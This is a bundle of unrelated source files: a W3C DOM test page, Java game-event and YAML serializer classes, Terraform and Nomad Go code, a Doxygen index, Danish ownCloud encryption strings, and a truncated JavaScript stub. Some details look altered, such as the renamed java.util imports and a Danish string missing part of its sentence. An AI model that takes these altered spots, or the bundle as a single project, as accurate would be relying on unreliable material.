window.doc = window;
SimpleTest.<API key>();
addLoadEvent(setUpPage);
function testFails (test) {
if (!test.result) {
test.todo = true;
return true;
}
return false;
}
function markTodos() {
if (todoTests[docName]) {
// mark the failures as todos
var failures = filter(testFails, SimpleTest._tests);
// shouldn't be 0 failures
todo(SimpleTest._tests != 0 && failures == 0, "test marked todo should fail somewhere");
}
}
function runJSUnitTests() {
builder = <API key>();
try {
forEach(<API key>(),
function (testName) {
window[testName]();
}
);
} catch (ex) {
ok(false, "Test threw exception: " + ex);
}
}
function textsplittexttwo() {
var success;
if(checkInitialization(builder, "textsplittexttwo") != null) return;
var doc;
var elementList;
var nameNode;
var textNode;
var splitNode;
var value;
var docRef = null;
if (typeof(this.doc) != 'undefined') {
docRef = this.doc;
}
doc = load(docRef, "doc", "staff");
elementList = doc.<API key>("name");
nameNode = elementList.item(2);
textNode = nameNode.firstChild;
splitNode = textNode.splitText(5);
value = textNode.nodeValue;
assertEquals("<API key>","Roger",value);
}
</script>
</head>
<body>
<h2>Test http:
<p></p>
<p>
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, European Research Consortium
for Informatics and Mathematics, Keio University). All
Rights Reserved. This work is distributed under the <a href="http:
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</p>
</body>
</html> |
package net.opengis.swe.v20;
/**
* <p>
* Tagging interface for all range components
* </p>
*
* @author Alex Robin
* @since Nov 8, 2014
*/
public interface RangeComponent extends SimpleComponent
{
} |
package minejava.event.player;
import minejava.Location;
import minejava.entity.Player;
import minejava.event.Cancellable;
import minejava.event.HandlerList;
public class PlayerMoveEvent extends PlayerEvent implements Cancellable{
private static final HandlerList handlers = new HandlerList();
private boolean cancel = false;
private Location from;
private Location to;
public PlayerMoveEvent(final Player player, final Location from, final Location to){
super(player);
this.from = from;
this.to = to;
}
@Override
public boolean isCancelled(){
return cancel;
}
@Override
public void setCancelled(boolean cancel){
this.cancel = cancel;
}
public Location getFrom(){
return from;
}
public void setFrom(Location from){
this.from = from;
}
public Location getTo(){
return to;
}
public void setTo(Location to){
this.to = to;
}
@Override
public HandlerList getHandlers(){
return handlers;
}
public static HandlerList getHandlerList(){
return handlers;
}
} |
package terraform
import (
"fmt"
"log"
"github.com/r3labs/terraform/dag"
)
// StateTransformer is a GraphTransformer that adds the elements of
// the state to the graph.
// This transform is used for example by the <API key> to ensure
// that only resources that are in the state are represented in the graph.
type StateTransformer struct {
Concrete <API key>
State *State
}
func (t *StateTransformer) Transform(g *Graph) error {
// If the state is nil or empty (nil is empty) then do nothing
if t.State.Empty() {
return nil
}
// Go through all the modules in the diff.
log.Printf("[TRACE] StateTransformer: starting")
var nodes []dag.Vertex
for _, ms := range t.State.Modules {
log.Printf("[TRACE] StateTransformer: Module: %v", ms.Path)
// Go through all the resources in this module.
for name, rs := range ms.Resources {
log.Printf("[TRACE] StateTransformer: Resource %q: %#v", name, rs)
// Add the resource to the graph
addr, err := <API key>(name)
if err != nil {
panic(fmt.Sprintf(
"Error parsing internal name, this is a bug: %q", name))
}
// Very important: add the module path for this resource to
// the address. Remove "root" from it.
addr.Path = ms.Path[1:]
// Add the resource to the graph
abstract := &<API key>{Addr: addr}
var node dag.Vertex = abstract
if f := t.Concrete; f != nil {
node = f(abstract)
}
nodes = append(nodes, node)
}
}
// Add all the nodes to the graph
for _, n := range nodes {
g.Add(n)
}
return nil
} |
package minejava.yaml.representer;
import minejava.reg.io.<API key>;
import minejava.reg.math.BigInteger;
import minejava.reg.util.ArrayList;
import minejava.reg.util.Arrays;
import minejava.util.Calendar;
import minejava.reg.util.Date;
import minejava.reg.util.HashMap;
import minejava.reg.util.Iterator;
import minejava.reg.util.LinkedHashMap;
import minejava.reg.util.List;
import minejava.reg.util.Map;
import minejava.reg.util.Set;
import minejava.reg.util.TimeZone;
import minejava.reg.util.UUID;
import minejava.reg.util.regex.Pattern;
import minejava.yaml.error.YAMLException;
import minejava.yaml.external.biz.base64Coder.Base64Coder;
import minejava.yaml.nodes.Node;
import minejava.yaml.nodes.Tag;
import minejava.yaml.reader.StreamReader;
class SafeRepresenter extends BaseRepresenter{
protected Map<Class<? extends Object>, Tag> classTags;
protected TimeZone timeZone = null;
public SafeRepresenter(){
this.nullRepresenter = new RepresentNull();
this.representers.put(String.class, new RepresentString());
this.representers.put(Boolean.class, new RepresentBoolean());
this.representers.put(Character.class, new RepresentString());
this.representers.put(UUID.class, new RepresentUuid());
this.representers.put(byte[].class, new RepresentByteArray());
Represent primitiveArray = new <API key>();
representers.put(short[].class, primitiveArray);
representers.put(int[].class, primitiveArray);
representers.put(long[].class, primitiveArray);
representers.put(float[].class, primitiveArray);
representers.put(double[].class, primitiveArray);
representers.put(char[].class, primitiveArray);
representers.put(boolean[].class, primitiveArray);
this.multiRepresenters.put(Number.class, new RepresentNumber());
this.multiRepresenters.put(List.class, new RepresentList());
this.multiRepresenters.put(Map.class, new RepresentMap());
this.multiRepresenters.put(Set.class, new RepresentSet());
this.multiRepresenters.put(Iterator.class, new RepresentIterator());
this.multiRepresenters.put(new Object[0].getClass(), new RepresentArray());
this.multiRepresenters.put(Date.class, new RepresentDate());
this.multiRepresenters.put(Enum.class, new RepresentEnum());
this.multiRepresenters.put(Calendar.class, new RepresentDate());
classTags = new HashMap<>();
}
protected Tag getTag(Class<?> clazz, Tag defaultTag){
if (classTags.containsKey(clazz)){
return classTags.get(clazz);
}else{
return defaultTag;
}
}
public Tag addClassTag(Class<? extends Object> clazz, Tag tag){
if (tag == null){
throw new <API key>("Tag must be provided.");
}
return classTags.put(clazz, tag);
}
protected class RepresentNull implements Represent{
@Override
public Node representData(Object data){
return representScalar(Tag.NULL, "null");
}
}
public static Pattern MULTILINE_PATTERN = Pattern.compile("\n|\u0085|\u2028|\u2029");
protected class RepresentString implements Represent{
@Override
public Node representData(Object data){
Tag tag = Tag.STR;
Character style = null;
String value = data.toString();
if (StreamReader.NON_PRINTABLE.matcher(value).find()){
tag = Tag.BINARY;
char[] binary;
try{
binary = Base64Coder.encode(value.getBytes("UTF-8"));
}catch (<API key> e){
throw new YAMLException(e);
}
value = String.valueOf(binary);
style = '|';
}
if (defaultScalarStyle == null && MULTILINE_PATTERN.matcher(value).find()){
style = '|';
}
return representScalar(tag, value, style);
}
}
protected class RepresentBoolean implements Represent{
@Override
public Node representData(Object data){
String value;
if (Boolean.TRUE.equals(data)){
value = "true";
}else{
value = "false";
}
return representScalar(Tag.BOOL, value);
}
}
protected class RepresentNumber implements Represent{
@Override
public Node representData(Object data){
Tag tag;
String value;
if (data instanceof Byte || data instanceof Short || data instanceof Integer || data instanceof Long || data instanceof BigInteger){
tag = Tag.INT;
value = data.toString();
}else{
Number number = (Number) data;
tag = Tag.FLOAT;
if (number.equals(Double.NaN)){
value = ".NaN";
}else if (number.equals(Double.POSITIVE_INFINITY)){
value = ".inf";
}else if (number.equals(Double.NEGATIVE_INFINITY)){
value = "-.inf";
}else{
value = number.toString();
}
}
return representScalar(getTag(data.getClass(), tag), value);
}
}
protected class RepresentList implements Represent{
@SuppressWarnings("unchecked")
@Override
public Node representData(Object data){
return representSequence(getTag(data.getClass(), Tag.SEQ), (List<Object>) data, null);
}
}
protected class RepresentIterator implements Represent{
@SuppressWarnings("unchecked")
@Override
public Node representData(Object data){
Iterator<Object> iter = (Iterator<Object>) data;
return representSequence(getTag(data.getClass(), Tag.SEQ), new IteratorWrapper(iter), null);
}
}
private static class IteratorWrapper implements Iterable<Object>{
private final Iterator<Object> iter;
public IteratorWrapper(Iterator<Object> iter){
this.iter = iter;
}
@Override
public Iterator<Object> iterator(){
return iter;
}
}
protected class RepresentArray implements Represent{
@Override
public Node representData(Object data){
Object[] array = (Object[]) data;
List<Object> list = Arrays.asList(array);
return representSequence(Tag.SEQ, list, null);
}
}
protected class <API key> implements Represent{
@Override
public Node representData(Object data){
Class<?> type = data.getClass().getComponentType();
if (byte.class == type){
return representSequence(Tag.SEQ, asByteList(data), null);
}else if (short.class == type){
return representSequence(Tag.SEQ, asShortList(data), null);
}else if (int.class == type){
return representSequence(Tag.SEQ, asIntList(data), null);
}else if (long.class == type){
return representSequence(Tag.SEQ, asLongList(data), null);
}else if (float.class == type){
return representSequence(Tag.SEQ, asFloatList(data), null);
}else if (double.class == type){
return representSequence(Tag.SEQ, asDoubleList(data), null);
}else if (char.class == type){
return representSequence(Tag.SEQ, asCharList(data), null);
}else if (boolean.class == type){
return representSequence(Tag.SEQ, asBooleanList(data), null);
}
throw new YAMLException("Unexpected primitive '" + type.getCanonicalName() + "'");
}
private List<Byte> asByteList(Object in){
byte[] array = (byte[]) in;
List<Byte> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Short> asShortList(Object in){
short[] array = (short[]) in;
List<Short> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Integer> asIntList(Object in){
int[] array = (int[]) in;
List<Integer> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Long> asLongList(Object in){
long[] array = (long[]) in;
List<Long> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Float> asFloatList(Object in){
float[] array = (float[]) in;
List<Float> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Double> asDoubleList(Object in){
double[] array = (double[]) in;
List<Double> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Character> asCharList(Object in){
char[] array = (char[]) in;
List<Character> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
private List<Boolean> asBooleanList(Object in){
boolean[] array = (boolean[]) in;
List<Boolean> list = new ArrayList<>(array.length);
for (int i = 0; i < array.length; ++i){
list.add(array[i]);
}
return list;
}
}
protected class RepresentMap implements Represent{
@SuppressWarnings("unchecked")
@Override
public Node representData(Object data){
return representMapping(getTag(data.getClass(), Tag.MAP), (Map<Object, Object>) data, null);
}
}
protected class RepresentSet implements Represent{
@SuppressWarnings("unchecked")
@Override
public Node representData(Object data){
Map<Object, Object> value = new LinkedHashMap<>();
Set<Object> set = (Set<Object>) data;
for (Object key : set){
value.put(key, null);
}
return representMapping(getTag(data.getClass(), Tag.SET), value, null);
}
}
protected class RepresentDate implements Represent{
@Override
public Node representData(Object data){
Calendar calendar;
if (data instanceof Calendar){
calendar = (Calendar) data;
}else{
calendar = Calendar.getInstance(getTimeZone() == null ? TimeZone.getTimeZone("UTC") : timeZone);
calendar.setTime((Date) data);
}
int years = calendar.get(Calendar.YEAR);
int months = calendar.get(Calendar.MONTH) + 1;
int days = calendar.get(Calendar.DAY_OF_MONTH);
int hour24 = calendar.get(Calendar.HOUR_OF_DAY);
int minutes = calendar.get(Calendar.MINUTE);
int seconds = calendar.get(Calendar.SECOND);
int millis = calendar.get(Calendar.MILLISECOND);
StringBuilder buffer = new StringBuilder(String.valueOf(years));
while (buffer.length() < 4){
buffer.insert(0, "0");
}
buffer.append("-");
if (months < 10){
buffer.append("0");
}
buffer.append(String.valueOf(months));
buffer.append("-");
if (days < 10){
buffer.append("0");
}
buffer.append(String.valueOf(days));
buffer.append("T");
if (hour24 < 10){
buffer.append("0");
}
buffer.append(String.valueOf(hour24));
buffer.append(":");
if (minutes < 10){
buffer.append("0");
}
buffer.append(String.valueOf(minutes));
buffer.append(":");
if (seconds < 10){
buffer.append("0");
}
buffer.append(String.valueOf(seconds));
if (millis > 0){
if (millis < 10){
buffer.append(".00");
}else if (millis < 100){
buffer.append(".0");
}else{
buffer.append(".");
}
buffer.append(String.valueOf(millis));
}
if (TimeZone.getTimeZone("UTC").equals(calendar.getTimeZone())){
buffer.append("Z");
}else{
int gmtOffset = calendar.getTimeZone().getOffset(calendar.get(Calendar.ERA), calendar.get(Calendar.YEAR), calendar.get(Calendar.MONTH), calendar.get(Calendar.DAY_OF_MONTH), calendar.get(Calendar.DAY_OF_WEEK), calendar.get(Calendar.MILLISECOND));
int minutesOffset = gmtOffset / (60 * 1000);
int hoursOffset = minutesOffset / 60;
int partOfHour = minutesOffset % 60;
buffer.append(hoursOffset > 0 ? "+" : "").append(hoursOffset).append(":").append(partOfHour < 10 ? "0" + partOfHour : partOfHour);
}
return representScalar(getTag(data.getClass(), Tag.TIMESTAMP), buffer.toString(), null);
}
}
protected class RepresentEnum implements Represent{
@Override
public Node representData(Object data){
Tag tag = new Tag(data.getClass());
return representScalar(getTag(data.getClass(), tag), ((Enum<?>) data).name());
}
}
protected class RepresentByteArray implements Represent{
@Override
public Node representData(Object data){
char[] binary = Base64Coder.encode((byte[]) data);
return representScalar(Tag.BINARY, String.valueOf(binary), '|');
}
}
public TimeZone getTimeZone(){
return timeZone;
}
public void setTimeZone(TimeZone timeZone){
this.timeZone = timeZone;
}
protected class RepresentUuid implements Represent{
@Override
public Node representData(Object data){
return representScalar(getTag(data.getClass(), new Tag(UUID.class)), data.toString());
}
}
} |
package testutils
import (
"context"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"strings"
"time"
testing "github.com/mitchellh/<API key>"
hclog "github.com/hashicorp/go-hclog"
plugin "github.com/hashicorp/go-plugin"
"github.com/hashicorp/nomad/client/allocdir"
"github.com/hashicorp/nomad/client/config"
"github.com/hashicorp/nomad/client/logmon"
"github.com/hashicorp/nomad/client/taskenv"
"github.com/hashicorp/nomad/helper/testlog"
"github.com/hashicorp/nomad/helper/uuid"
"github.com/hashicorp/nomad/nomad/mock"
"github.com/hashicorp/nomad/nomad/structs"
"github.com/hashicorp/nomad/plugins/base"
"github.com/hashicorp/nomad/plugins/drivers"
"github.com/hashicorp/nomad/plugins/shared/hclspec"
"github.com/stretchr/testify/require"
)
type DriverHarness struct {
drivers.DriverPlugin
client *plugin.GRPCClient
server *plugin.GRPCServer
t testing.T
logger hclog.Logger
impl drivers.DriverPlugin
}
func (h *DriverHarness) Impl() drivers.DriverPlugin {
return h.impl
}
func NewDriverHarness(t testing.T, d drivers.DriverPlugin) *DriverHarness {
logger := testlog.HCLogger(t).Named("driver_harness")
pd := drivers.NewDriverPlugin(d, logger)
client, server := plugin.TestPluginGRPCConn(t,
map[string]plugin.Plugin{
base.PluginTypeDriver: pd,
base.PluginTypeBase: &base.PluginBase{Impl: d},
"logmon": logmon.NewPlugin(logmon.NewLogMon(logger.Named("logmon"))),
},
)
raw, err := client.Dispense(base.PluginTypeDriver)
if err != nil {
t.Fatalf("err dispensing plugin: %v", err)
}
dClient := raw.(drivers.DriverPlugin)
h := &DriverHarness{
client: client,
server: server,
DriverPlugin: dClient,
logger: logger,
t: t,
impl: d,
}
return h
}
func (h *DriverHarness) Kill() {
h.client.Close()
h.server.Stop()
}
// tinyChroot is useful for testing, where we do not use anything other than
// trivial /bin commands like sleep and sh.
// Note that you cannot chroot a symlink.
var tinyChroot = map[string]string{
// destination: /bin
"/usr/bin/sleep": "/bin/sleep",
"/usr/bin/dash": "/bin/sh",
"/usr/bin/bash": "/bin/bash",
"/usr/bin/cat": "/bin/cat",
// destination: /usr/bin
"/usr/bin/stty": "/usr/bin/stty",
"/usr/bin/head": "/usr/bin/head",
"/usr/bin/mktemp": "/usr/bin/mktemp",
"/usr/bin/echo": "/usr/bin/echo",
"/usr/bin/touch": "/usr/bin/touch",
"/usr/bin/stat": "/usr/bin/stat",
// destination: /etc/
"/etc/ld.so.cache": "/etc/ld.so.cache",
"/etc/ld.so.conf": "/etc/ld.so.conf",
"/etc/ld.so.conf.d": "/etc/ld.so.conf.d",
"/etc/passwd": "/etc/passwd",
"/etc/resolv.conf": "/etc/resolv.conf",
// others
"/lib": "/lib",
"/lib32": "/lib32",
"/lib64": "/lib64",
"/usr/lib/jvm": "/usr/lib/jvm",
"/run/resolvconf": "/run/resolvconf",
"/run/systemd/resolve": "/run/systemd/resolve",
}
// MkAllocDir creates a temporary directory and allocdir structure.
// If enableLogs is set to true a logmon instance will be started to write logs
// to the LogDir of the task
// A cleanup func is returned and should be deferred so as to not leak dirs
// between tests.
func (h *DriverHarness) MkAllocDir(t *drivers.TaskConfig, enableLogs bool) func() {
dir, err := ioutil.TempDir("", "<API key>-")
require.NoError(h.t, err)
allocDir := allocdir.NewAllocDir(h.logger, dir, t.AllocID)
require.NoError(h.t, allocDir.Build())
t.AllocDir = allocDir.AllocDir
taskDir := allocDir.NewTaskDir(t.Name)
caps, err := h.Capabilities()
require.NoError(h.t, err)
fsi := caps.FSIsolation
require.NoError(h.t, taskDir.Build(fsi == drivers.FSIsolationChroot, tinyChroot))
task := &structs.Task{
Name: t.Name,
Env: t.Env,
}
// Create the mock allocation
alloc := mock.Alloc()
if t.Resources != nil {
alloc.AllocatedResources.Tasks[task.Name] = t.Resources.NomadResources
}
taskBuilder := taskenv.NewBuilder(mock.Node(), alloc, task, "global")
SetEnvvars(taskBuilder, fsi, taskDir, config.DefaultConfig())
taskEnv := taskBuilder.Build()
if t.Env == nil {
t.Env = taskEnv.Map()
} else {
for k, v := range taskEnv.Map() {
if _, ok := t.Env[k]; !ok {
t.Env[k] = v
}
}
}
//logmon
if enableLogs {
lm := logmon.NewLogMon(h.logger.Named("logmon"))
if runtime.GOOS == "windows" {
id := uuid.Generate()[:8]
t.StdoutPath = fmt.Sprintf("//./pipe/%s-%s.stdout", t.Name, id)
t.StderrPath = fmt.Sprintf("//./pipe/%s-%s.stderr", t.Name, id)
} else {
t.StdoutPath = filepath.Join(taskDir.LogDir, fmt.Sprintf(".%s.stdout.fifo", t.Name))
t.StderrPath = filepath.Join(taskDir.LogDir, fmt.Sprintf(".%s.stderr.fifo", t.Name))
}
err = lm.Start(&logmon.LogConfig{
LogDir: taskDir.LogDir,
StdoutLogFile: fmt.Sprintf("%s.stdout", t.Name),
StderrLogFile: fmt.Sprintf("%s.stderr", t.Name),
StdoutFifo: t.StdoutPath,
StderrFifo: t.StderrPath,
MaxFiles: 10,
MaxFileSizeMB: 10,
})
require.NoError(h.t, err)
return func() {
lm.Stop()
h.client.Close()
allocDir.Destroy()
}
}
return func() {
h.client.Close()
allocDir.Destroy()
}
}
// WaitUntilStarted will block until the task for the given ID is in the running
// state or the timeout is reached
func (h *DriverHarness) WaitUntilStarted(taskID string, timeout time.Duration) error {
deadline := time.Now().Add(timeout)
var lastState drivers.TaskState
for {
status, err := h.InspectTask(taskID)
if err != nil {
return err
}
if status.State == drivers.TaskStateRunning {
return nil
}
lastState = status.State
if time.Now().After(deadline) {
return fmt.Errorf("task never transitioned to running, currently '%s'", lastState)
}
time.Sleep(100 * time.Millisecond)
}
}
// MockDriver is used for testing.
// Each function can be set as a closure to make assertions about how data
// is passed through the base plugin layer.
type MockDriver struct {
base.MockPlugin
TaskConfigSchemaF func() (*hclspec.Spec, error)
FingerprintF func(context.Context) (<-chan *drivers.Fingerprint, error)
CapabilitiesF func() (*drivers.Capabilities, error)
RecoverTaskF func(*drivers.TaskHandle) error
StartTaskF func(*drivers.TaskConfig) (*drivers.TaskHandle, *drivers.DriverNetwork, error)
WaitTaskF func(context.Context, string) (<-chan *drivers.ExitResult, error)
StopTaskF func(string, time.Duration, string) error
DestroyTaskF func(string, bool) error
InspectTaskF func(string) (*drivers.TaskStatus, error)
TaskStatsF func(context.Context, string, time.Duration) (<-chan *drivers.TaskResourceUsage, error)
TaskEventsF func(context.Context) (<-chan *drivers.TaskEvent, error)
SignalTaskF func(string, string) error
ExecTaskF func(string, []string, time.Duration) (*drivers.ExecTaskResult, error)
ExecTaskStreamingF func(context.Context, string, *drivers.ExecOptions) (*drivers.ExitResult, error)
MockNetworkManager
}
type MockNetworkManager struct {
CreateNetworkF func(string, *drivers.<API key>) (*drivers.<API key>, bool, error)
DestroyNetworkF func(string, *drivers.<API key>) error
}
func (m *MockNetworkManager) CreateNetwork(allocID string, req *drivers.<API key>) (*drivers.<API key>, bool, error) {
return m.CreateNetworkF(allocID, req)
}
func (m *MockNetworkManager) DestroyNetwork(id string, spec *drivers.<API key>) error {
return m.DestroyNetworkF(id, spec)
}
func (d *MockDriver) TaskConfigSchema() (*hclspec.Spec, error) { return d.TaskConfigSchemaF() }
func (d *MockDriver) Fingerprint(ctx context.Context) (<-chan *drivers.Fingerprint, error) {
return d.FingerprintF(ctx)
}
func (d *MockDriver) Capabilities() (*drivers.Capabilities, error) { return d.CapabilitiesF() }
func (d *MockDriver) RecoverTask(h *drivers.TaskHandle) error { return d.RecoverTaskF(h) }
func (d *MockDriver) StartTask(c *drivers.TaskConfig) (*drivers.TaskHandle, *drivers.DriverNetwork, error) {
return d.StartTaskF(c)
}
func (d *MockDriver) WaitTask(ctx context.Context, id string) (<-chan *drivers.ExitResult, error) {
return d.WaitTaskF(ctx, id)
}
func (d *MockDriver) StopTask(taskID string, timeout time.Duration, signal string) error {
return d.StopTaskF(taskID, timeout, signal)
}
func (d *MockDriver) DestroyTask(taskID string, force bool) error {
return d.DestroyTaskF(taskID, force)
}
func (d *MockDriver) InspectTask(taskID string) (*drivers.TaskStatus, error) {
return d.InspectTaskF(taskID)
}
func (d *MockDriver) TaskStats(ctx context.Context, taskID string, i time.Duration) (<-chan *drivers.TaskResourceUsage, error) {
return d.TaskStatsF(ctx, taskID, i)
}
func (d *MockDriver) TaskEvents(ctx context.Context) (<-chan *drivers.TaskEvent, error) {
return d.TaskEventsF(ctx)
}
func (d *MockDriver) SignalTask(taskID string, signal string) error {
return d.SignalTaskF(taskID, signal)
}
func (d *MockDriver) ExecTask(taskID string, cmd []string, timeout time.Duration) (*drivers.ExecTaskResult, error) {
return d.ExecTaskF(taskID, cmd, timeout)
}
func (d *MockDriver) ExecTaskStreaming(ctx context.Context, taskID string, execOpts *drivers.ExecOptions) (*drivers.ExitResult, error) {
return d.ExecTaskStreamingF(ctx, taskID, execOpts)
}
// SetEnvvars sets path and host env vars depending on the FS isolation used.
func SetEnvvars(envBuilder *taskenv.Builder, fsi drivers.FSIsolation, taskDir *allocdir.TaskDir, conf *config.Config) {
envBuilder.SetClientTaskRoot(taskDir.Dir)
envBuilder.<API key>(taskDir.SharedAllocDir)
envBuilder.<API key>(taskDir.LocalDir)
envBuilder.<API key>(taskDir.SecretsDir)
// Set driver-specific environment variables
switch fsi {
case drivers.FSIsolationNone:
// Use host paths
envBuilder.SetAllocDir(taskDir.SharedAllocDir)
envBuilder.SetTaskLocalDir(taskDir.LocalDir)
envBuilder.SetSecretsDir(taskDir.SecretsDir)
default:
// filesystem isolation; use container paths
envBuilder.SetAllocDir(allocdir.<API key>)
envBuilder.SetTaskLocalDir(allocdir.<API key>)
envBuilder.SetSecretsDir(allocdir.<API key>)
}
// Set the host environment variables for non-image based drivers
if fsi != drivers.FSIsolationImage {
// COMPAT(1.0) using inclusive language, blacklist is kept for backward compatibility.
filter := strings.Split(conf.<API key>(
[]string{"env.denylist", "env.blacklist"},
config.DefaultEnvDenylist,
), ",")
envBuilder.SetHostEnvvars(filter)
}
} |
var searchData=
[
['<API key>',['<API key>',['../<API key>.html#<API key>',1,'pathpy::MultiOrderModel::MultiOrderModel']]],
['totaledgeweight',['totalEdgeWeight',['../<API key>.html#<API key>',1,'pathpy::HigherOrderNetwork::HigherOrderNetwork']]]
]; |
OC.L10N.register(
"encryption",
{
"Missing recovery key password" : "Der mangler kodeord for gendannelsesnøgle",
"Please repeat the recovery key password" : "Gentag venligst kodeordet for gendannelsesnøglen",
"Repeated recovery key password does not match the provided recovery key password" : "Det gentagne kodeord for gendannelsesnøglen stemmer ikke med det angivne kodeord for gendannelsesnøglen",
"Recovery key successfully enabled" : "Gendannelsesnøgle aktiveret med succes",
"Could not enable recovery key. Please check your recovery key password!" : "Kunne ikke aktivere gendannelsesnøgle. Kontroller venligst dit gendannelsesnøgle kodeord!",
"Recovery key successfully disabled" : "Gendannelsesnøgle deaktiveret succesfuldt",
"Could not disable recovery key. Please check your recovery key password!" : "Kunne ikke deaktivere gendannelsesnøgle. Kontroller din gendannelsesnøgle kodeord!",
"Missing parameters" : "Manglende parametre",
"Please provide the old recovery password" : "Angiv venligst det gamle kodeord for gendannelsesnøglen",
"Please provide a new recovery password" : "Angiv venligst et nyt kodeord til gendannelse",
"Please repeat the new recovery password" : "Gentag venligst det nye kodeord til gendannelse",
"Password successfully changed." : "Kodeordet blev ændret succesfuldt",
"Could not change the password. Maybe the old password was not correct." : "Kunne ikke ændre kodeordet. Måske var det gamle kodeord ikke korrekt.",
"Recovery Key disabled" : "Gendannelsesnøgle er slået fra",
"Recovery Key enabled" : "Gendannalsesnøgle aktiv",
"Could not enable the recovery key, please try again or contact your administrator" : "Kunne ikke aktivere gendannelsesnøglen, venligst prøv igen eller kontakt din administrator",
"Could not update the private key password." : "Kunne ikke opdatere kodeordet til den private nøgle.",
"The old password was not correct, please try again." : "Det gamle kodeord var ikke korrekt, prøv venligst igen.",
"The current log-in password was not correct, please try again." : "Det nuværende kodeord til log-in var ikke korrekt, prøv venligst igen.",
"Private key password successfully updated." : "Privat nøgle kodeord succesfuldt opdateret.",
"You need to migrate your encryption keys from the old encryption (ownCloud <= 8.0) to the new one. Please run 'occ encryption:migrate' or contact your administrator" : "Du skal overflytte dine krypteringsnøgler fra den gamle kryptering (ownCloud <= 8.0) til den nye af slagsen. Kør venligst \"occ encryption:migrate\" eller kontakt din administrator.",
"Invalid private key for Encryption App. Please update your private key password in your personal settings to recover access to your encrypted files." : "Ugyldig privat nøgle for <API key>. Opdater venligst dit kodeord for den private nøgle i dine personlige indstillinger. Det kræves for at få adgang til dine krypterede filer.",
"Encryption App is enabled and ready" : "App til kryptering er slået til og er klar",
"Bad Signature" : "Ugyldig signatur",
"Missing Signature" : "Signatur mangler",
"one-time password for <API key>" : "Engangs password for kryptering på serverdelen",
"Can not decrypt this file, probably this is a shared file. Please ask the file owner to reshare the file with you." : "Kan ikke kryptere denne fil, sandsynligvis fordi filen er delt. Bed venligst filens ejer om at dele den med dig på ny.",
"Can not read this file, probably this is a shared file. Please ask the file owner to reshare the file with you." : "Kan ikke læse denne fil, sandsynligvis fordi det er en delt fil. Bed venligst ejeren af filen om at dele filen med dig på ny.",
"Hey there,\n\nthe admin enabled <API key>. Your files were encrypted using the password '%s'.\n\nPlease login to the web interface, go to the section 'ownCloud basic encryption module' of your personal settings and update your encryption password by entering this password into the 'old log-in password' field and your current login-password.\n\n" : "Hejsa,\n\nadministrator aktiveret kryptering på serverdelen. '%s'.\n\nVenligst log på web brugerfladen, gå til sektionen \"ownCloud grundlæggende krypterings modul\" for din personlige opsætninger og opdater dine krypterings kodeord ved at indtaste dette kodeord i \"gamle kodeord log\" feltet samt dit nuværende kodeord.\n\n",
"The share will expire on %s." : "Delingen vil udløbe om %s.",
"Cheers!" : "Hej!",
"Hey there,<br><br>the admin enabled <API key>. Your files were encrypted using the password <strong>%s</strong>.<br><br>Please login to the web interface, go to the section \"ownCloud basic encryption module\" of your personal settings and update your encryption password by entering this password into the \"old log-in password\" field and your current login-password.<br><br>" : "Hejsa,<br><br>administrator aktiveret kryptering på serverdelen. Dine file er blevet krypteret med kodeordet <strong>%s</strong>.<br><br>Venligst log på web brugerfladen, gå til sektionen \"ownCloud grundlæggende krypterings modul\" for din personlige opsætninger og opdater dine krypterings kodeord ved at indtaste dette kodeord i \"gamle kodeord log\" feltet samt dit nuværende kodeord.<br><br>",
"Encryption" : "Kryptering",
"Encryption App is enabled but your keys are not initialized, please log-out and log-in again" : "<API key> er aktiveret, men din nøgler er ikke igangsat. Log venligst ud og ind igen.",
"Encrypt the home storage" : "Krypter hjemmelageret",
"Enabling this option encrypts all files stored on the main storage, otherwise only files on external storage will be encrypted" : "Ved at slå denne valgmulighed til krypteres alle filer i hovedlageret, ellers vil kun filer på eksternt lager blive krypteret",
"Enable recovery key" : "Aktivér gendannelsesnøgle",
"Disable recovery key" : "Deaktivér gendannelsesnøgle",
"The recovery key is an extra encryption key that is used to encrypt files. It allows recovery of a user's files if the user forgets his or her password." : "Gendannelsesnøglen er en ekstra krypteringsnøgle, der bruges til at kryptere filer. Den tillader gendannelse af en brugers filer, hvis brugeren glemmer sin adgangskode.",
"Recovery key password" : "Gendannelsesnøgle kodeord",
"Repeat recovery key password" : "Gentag adgangskode for gendannelsesnøgle",
"Change recovery key password:" : "Skift gendannelsesnøgle kodeord:",
"Old recovery key password" : "Gammel adgangskode for gendannelsesnøgle",
"New recovery key password" : "Ny adgangskode for gendannelsesnøgle",
"Repeat new recovery key password" : "Gentag ny adgangskode for gendannelsesnøgle",
"Change Password" : "Skift Kodeord",
"ownCloud basic encryption module" : "ownCloud basis krypteringsmodul",
"Your private key password no longer matches your log-in password." : "Dit private nøglekodeord stemmer ikke længere overens med dit login-kodeord.",
"Set your old private key password to your current log-in password:" : "Sæt dit gamle, private nøglekodeord til at være dit nuværende login-kodeord. ",
" If you don't remember your old password you can ask your administrator to recover your files." : "Hvis du ikke kan huske dit gamle kodeord kan du bede din administrator om at gendanne dine filer.",
"Old log-in password" : "Gammelt login kodeord",
"Current log-in password" : "Nuvrende login kodeord",
"Update Private Key Password" : "Opdater Privat Nøgle Kodeord",
"Enable password recovery:" : "Aktiver kodeord gendannelse:",
"Enabling this option will allow you to reobtain access to your encrypted files in case of password loss" : "Aktivering af denne valgmulighed tillader dig at generhverve adgang til dine krypterede filer i tilfælde af tab af kodeord",
"Enabled" : "Aktiveret",
"Disabled" : "Deaktiveret"
},
"nplurals=2; plural=(n != 1);"); |
define([
'backbone',
'jquery',
'jqueryui'
], function (
) {
'use strict';
/* Initialise the menus and associated events */
